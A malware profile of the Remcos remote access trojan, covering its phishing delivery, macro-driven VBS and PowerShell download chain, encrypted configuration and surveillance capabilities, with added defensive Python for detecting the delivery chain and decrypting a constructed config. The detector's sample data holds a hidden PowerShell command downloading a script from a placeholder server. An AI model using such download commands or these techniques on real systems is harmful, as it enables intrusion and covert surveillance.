Remcos (RAT) – Malware

June 30, 2023
in Malware, Types of Malware
Name: Remcos
Type of Malware: RAT
Date of Initial Activity: 2016
Associated Groups: Gorgon Group, LazyScripter
Motivation: Run keyloggers and surveillance (audio + screenshots) to steal accounts, sensitive information, and cryptocurrencies, and enable follow-on infections
Attack Vectors: Phishing emails, infected email attachments (PDFs and Office documents)
Targeted System: Windows

Overview

Remcos is a RAT that first appeared in the wild in 2016. It spreads through malicious Microsoft Office documents attached to spam emails and is designed to bypass Microsoft Windows UAC and execute with high-level privileges.

Remcos itself is a legitimate tool sold by a German company named Breaking Security under the name Remote Control and Surveillance, and it is commonly abused by hackers.

Targets

Regular users.

Tools / Techniques Used

After infecting a computer, Remcos provides an attacker with backdoor access to the infected system and collects a variety of sensitive information. Remcos is commonly deployed via a phishing attack. The malware may be embedded in a malicious ZIP file masquerading as a PDF that claims to contain an invoice or order. Alternatively, the malware has also been deployed using Microsoft Office documents and malicious macros that unpack and deploy the malware.

To evade detection, Remcos uses process injection or process hollowing, which lets it run inside a legitimate process. The malware also deploys persistence mechanisms and runs in the background to hide from users. As a RAT, command and control (C2) is a core capability of Remcos. The malicious traffic is encrypted en route to the C2 server, and the attacker uses Distributed DNS to create a variety of domains for C2 servers. This makes it possible for the malware to defeat protections that rely on filtering traffic to known malicious domains.

In one observed phishing campaign, the attached Excel document, once opened in Excel, asks for a password to view the document; that password has already been provided in the email. Because the file contains macro code, Excel shows a yellow security warning bar to warn the victim of the danger. The document's message lures the victim into clicking the Enable Content button, which dismisses the warning and executes the malicious macro code.

The macro has a function called “Workbook_Activate()” that is called automatically when the workbook opens. Its task is to extract VBS code from the worksheet cells into the file “%AppData%\HobYQ.vbs” and then execute it. To protect the Remcos payload, the chain uses a deliberately convoluted, multi-stage download process.

In this way, it executes both VBS and PowerShell script code. “HobYQ.vbs” runs a segment of dynamically assembled PowerShell code to download another VBS file (“flip.vbs”) from the attacker’s server and run it. Next, “flip.vbs” downloads a file called “mem.txt” from the server, a piece of encoded VBS code that is later executed within “flip.vbs” to download the final file, called “faze.jpg”, from the same server.
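The macro-to-VBS-to-PowerShell chain described above leaves a recognisable process ancestry (an Office host, a script host running a .vbs from under AppData, then PowerShell issuing a download) that can be hunted for in process-creation telemetry. The following is an added example, not code from the page or from any of the analyses it draws on; the event fields, paths and URL are constructed for the demonstration.

```python
"""Flag the Excel macro -> %AppData% .vbs -> PowerShell download chain in process-creation events."""
import re
from typing import Dict, List, Tuple

OFFICE_HOSTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# A .vbs dropped under the user's AppData tree, as with "%AppData%\HobYQ.vbs" in the text.
APPDATA_VBS = re.compile(r'\\appdata\\[^"]*\.vbs\b', re.IGNORECASE)
# PowerShell download primitives typical of the second-stage downloader.
DOWNLOAD_CMD = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.IGNORECASE)

Event = Dict[str, object]


def find_delivery_chains(events: List[Event]) -> List[Tuple[str, str, str]]:
    """Return (office image, script-host cmdline, powershell cmdline) for each matching chain."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for ev in events:
        cmd = str(ev["cmdline"])
        if str(ev["image"]).lower() != "powershell.exe" or not DOWNLOAD_CMD.search(cmd):
            continue
        parent = by_pid.get(ev["ppid"])
        if not parent or str(parent["image"]).lower() not in SCRIPT_HOSTS:
            continue
        if not APPDATA_VBS.search(str(parent["cmdline"])):
            continue
        grandparent = by_pid.get(parent["ppid"])
        if grandparent and str(grandparent["image"]).lower() in OFFICE_HOSTS:
            hits.append((str(grandparent["image"]), str(parent["cmdline"]), cmd))
    return hits


# Constructed sample events (Sysmon-style fields, not real telemetry); the URL is a placeholder.
SAMPLE_EVENTS: List[Event] = [
    {"pid": 100, "ppid": 10, "image": "EXCEL.EXE",
     "cmdline": r'"C:\Program Files\Microsoft Office\EXCEL.EXE" invoice.xls'},
    {"pid": 200, "ppid": 100, "image": "wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\u\AppData\Roaming\HobYQ.vbs"'},
    {"pid": 300, "ppid": 200, "image": "powershell.exe",
     "cmdline": "powershell -w hidden -c \"(New-Object Net.WebClient).DownloadString('http://c2.example.invalid/flip.vbs')\""},
    # Benign: PowerShell launched from Explorer, with no AppData .vbs script host as parent.
    {"pid": 400, "ppid": 10, "image": "powershell.exe", "cmdline": "powershell Get-Process"},
]

if __name__ == "__main__":
    for chain in find_delivery_chains(SAMPLE_EVENTS):
        print("suspicious chain:", chain)
```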

Every Remcos sample contains an RC4-encrypted configuration block in its PE resource section, named “SETTINGS”, as shown in Figure 8. The first byte (“B1” in that sample) is the size of the RC4 key that follows, and the remaining data is the encrypted Remcos configuration block.

The first thing Remcos does is decrypt the configuration block, which it consults throughout its lifetime. The block contains, among other things, the C2 server information, the name Remcos assigns so the attacker can recognize the victim, the Remcos sub-key name in the registry, the name of the log file that records the victim’s keylogger and clipboard data, many flags telling Remcos which features to start on the victim’s device, and the authentication data used to establish the connection to the C2 server.
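The two paragraphs above describe the layout of the “SETTINGS” resource precisely enough to write a configuration extractor, which is the usual first step when triaging a Remcos sample. The following is an added example, not code from the page or its sources: it takes the raw resource bytes as input (extracting the resource from the PE itself is left to a tool such as pefile), and the key, config fields and delimiter are constructed placeholders rather than the real Remcos format.

```python
"""Parse a Remcos-style SETTINGS blob: [key_len][rc4_key][rc4(config)] (added example)."""
from typing import Tuple


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 keystream XOR; symmetric, so one routine encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def parse_settings_blob(blob: bytes) -> Tuple[bytes, bytes]:
    """Split the resource per the layout in the text and return (rc4_key, decrypted_config).

    Byte 0 is the RC4 key length, the key follows, and the remainder is the
    RC4-encrypted configuration block.
    """
    if not blob:
        raise ValueError("empty SETTINGS blob")
    key_len = blob[0]
    if key_len == 0 or len(blob) < 1 + key_len + 1:
        raise ValueError("blob too short for declared key length %d" % key_len)
    key = blob[1:1 + key_len]
    return key, rc4(key, blob[1 + key_len:])


def build_sample_blob(key: bytes, config: bytes) -> bytes:
    """Constructed test blob (not a real Remcos sample): encrypt config under key."""
    return bytes([len(key)]) + key + rc4(key, config)


# Constructed sample key and config; field names and delimiter are illustrative only.
SAMPLE_KEY = b"example-key-not-real"
SAMPLE_CONFIG = b"c2.example.invalid:2404|Victim-Tag|Remcos-Sub|logs.dat"
SAMPLE_BLOB = build_sample_blob(SAMPLE_KEY, SAMPLE_CONFIG)

if __name__ == "__main__":
    key, cfg = parse_settings_blob(SAMPLE_BLOB)
    print("RC4 key:", key, "\nconfig:", cfg.decode())
```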

The workflow of Remcos is straightforward: it starts many threads to perform auto-start work according to the flags defined in the configuration block. This includes:

  • Adding Remcos to the auto-run group in the system registry
  • Starting a watchdog program (Remcos’ daemon program)
  • Recording the victim’s audio input from an input device (microphone)
  • Capturing the victim’s screenshots at startup
  • Disabling UAC (User Account Control) on the victim’s device

Remcos Malware Capabilities

Some of the key capabilities of the malware include:

  • Privilege Elevation: Remcos can gain Administrator permissions on an infected system and disable User Account Control (UAC). This makes it easier for the attacker to execute malicious functionality.
  • Defense Evasion: Remcos uses process injection to embed itself within legitimate processes, making it more difficult for antivirus to detect. Additionally, the malware can run in the background to hide itself from users.
  • Data Collection: One of the core capabilities of the Remcos malware is to collect information about the user of a computer. It can log keystrokes, capture screenshots, audio, and clipboard contents, and collect passwords from the infected system.

Impact / Significant Attacks

Operation Spalax.
